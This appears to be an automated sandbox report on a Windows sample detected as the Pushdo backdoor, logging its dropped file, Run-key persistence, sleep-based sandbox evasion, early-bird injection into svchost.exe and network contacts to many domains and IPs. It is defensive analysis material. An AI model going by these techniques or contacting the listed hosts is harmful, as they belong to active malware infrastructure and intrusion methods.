Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: 6gjnnBAbpc.exe

Static PE information: More than 1099 > 100 exports found

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_00412210 push ebx; mov dword ptr [esp], esi	0_2_004122B4
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_004123F0 push eax; mov dword ptr [esp], edi	0_2_004125EF
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_00412210 push ebx; mov dword ptr [esp], esi	1_2_004122B4
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_004123F0 push eax; mov dword ptr [esp], edi	1_2_004125EF

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Code function: 0_2_10001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

0_2_10001030

Persistence and Installation Behavior

Yara detected Backdoor Pushdo

Source: Yara match	File source: 1.2.pigalicapi.exe.24c1e88.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.10004088.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.10004088.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.f11e88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.10004088.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.24c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.f11e88.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.f30000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.10004088.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.2790000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.10004088.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.4000000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.4000000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.2791e88.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.2791e88.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.f10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pigalicapi.exe.f10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.10004088.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.24c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6gjnnBAbpc.exe.2790000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.pigalicapi.exe.24c1e88.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.4000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.671122999.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.642040224.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.642410962.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.669497358.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.651890416.0000000002790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.670270360.0000000010004000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

File created: C:\Users\user\pigalicapi.exe

Jump to dropped file

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

File created: C:\Users\user\pigalicapi.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

File created: C:\Users\user\pigalicapi.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\svchost.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi			Jump to behavior
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi			Jump to behavior

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Stalling execution: Execution stalls by calling Sleep

graph_0-15980

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,		0_2_04003B00
Source: C:\Users\user\pigalicapi.exe	Code function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,		1_2_024E3B00

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe TID: 5896	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe TID: 5996	Thread sleep time: -21600000s >= -30000s	Jump to behavior
Source: C:\Users\user\pigalicapi.exe TID: 860	Thread sleep time: -21600000s >= -30000s	Jump to behavior
Source: C:\Users\user\pigalicapi.exe TID: 5944	Thread sleep time: -21600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5284	Thread sleep count: 149 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 1784	Thread sleep time: -145000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 6080	Thread sleep count: 187 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 11600	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 4016	Thread sleep count: 148 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 5268	Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 4904	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 4988	Thread sleep count: 1177 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 996	Thread sleep count: 1207 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 5448	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 6200	Thread sleep count: 1265 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 6208	Thread sleep count: 1253 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 4736	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 6224	Thread sleep count: 422 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 6232	Thread sleep count: 469 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 5000	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 11576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 13460	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 16444	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 16476	Thread sleep count: 34 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 19096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 23244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 23300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 5912	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 23752	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\pigalicapi.exe	Evasive API call chain: GetLocalTime,DecisionNodes			graph_1-16631
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Evasive API call chain: GetLocalTime,DecisionNodes			graph_0-16381

Source: C:\Users\user\pigalicapi.exe	Last function: Thread delayed
Source: C:\Users\user\pigalicapi.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

0_2_04001CA0

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Thread delayed: delay time: 21600000	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Thread delayed: delay time: 21600000	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Thread delayed: delay time: 21600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 1177
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 1207
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 1265
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 1253
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 422
Source: C:\Windows\SysWOW64\svchost.exe	Window / User API: threadDelayed 469

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-16084
Source: C:\Users\user\pigalicapi.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_1-16336

Source: C:\Users\user\pigalicapi.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_1-16612
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_0-16362

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: GetAdaptersInfo,		0_2_04009F70
Source: C:\Users\user\pigalicapi.exe	Code function: GetAdaptersInfo,		1_2_024E9F70

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Code function: 0_2_04008F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,

0_2_04008F80

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Thread delayed: delay time: 21600000	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Thread delayed: delay time: 21600000	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Thread delayed: delay time: 21600000	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	API call chain: ExitProcess graph end node			graph_0-15949
Source: C:\Users\user\pigalicapi.exe	API call chain: ExitProcess graph end node			graph_1-16199

Source: 6gjnnBAbpc.exe, 00000000.00000003.435643322.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.536954407.0000000008D6A000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.306098000.0000000008D30000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.305232643.0000000008D6C000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D25000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.304691611.0000000008D6C000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

0_2_04001CA0

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Code function: 0_2_10001030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

0_2_10001030

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Code function: 0_2_040097A0 GetProcessHeap,RtlAllocateHeap,

0_2_040097A0

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04003090 mov eax, dword ptr fs:[00000030h]	0_2_04003090
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_00E609FC mov eax, dword ptr fs:[00000030h]	0_2_00E609FC
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_10001030 mov eax, dword ptr fs:[00000030h]	0_2_10001030
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E3090 mov eax, dword ptr fs:[00000030h]	1_2_024E3090
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_00A209FC mov eax, dword ptr fs:[00000030h]	1_2_00A209FC
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_10001030 mov eax, dword ptr fs:[00000030h]	1_2_10001030

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Code function: 0_2_00401EBB LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,

0_2_00401EBB

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_00401179 InterlockedCompareExchange,Sleep,Sleep,InterlockedCompareExchange,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,InterlockedExchange,GetStartupInfoA,_initterm,exit,	0_2_00401179
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_0040D4FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_0040D4FC
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_0040D500 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_0040D500
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04003B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,	0_2_04003B00
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_00401179 InterlockedCompareExchange,Sleep,Sleep,InterlockedCompareExchange,SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,InterlockedExchange,GetStartupInfoA,_initterm,exit,	1_2_00401179
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_0040D4FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	1_2_0040D4FC
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_0040D500 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	1_2_0040D500
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E3B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,	1_2_024E3B00

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\svchost.exe			Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Process created / APC Queued / Resumed: C:\Windows\SysWOW64\svchost.exe			Jump to behavior

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Domain query: impexnc.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: webways.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dayvo.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dataform.co.uk
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: shteeble.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.26.7.17 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: kallman.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 217.69.139.150 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: nt-hat.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 76.74.184.61 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gphpedit.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 107.180.58.31 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: avse.hu
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 203.210.102.34 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 194.143.194.23 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 5.189.171.125 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 91.229.22.126 443
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: notis.ru
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: nts-web.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: willsub.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.tyrns.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: shesfit.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.65.224 443
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 217.74.161.133 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: multip.hu
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: tcpoa.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 13.248.169.48 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 173.194.202.26 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dog-jog.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 37.59.243.164 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: kamptal.at
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 217.19.254.22 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bd-style.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 185.163.45.187 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 216.177.137.32 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: zupraha.cz
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.89.126 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.21.30.14 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: muhr-soehne.de
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 49.12.155.123 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 46.30.60.158 25
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: oaith.ca
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 49.212.180.178 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 88.86.118.82 25
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 192.99.226.184 80
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: aiolos-sa.gr
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: usadig.com
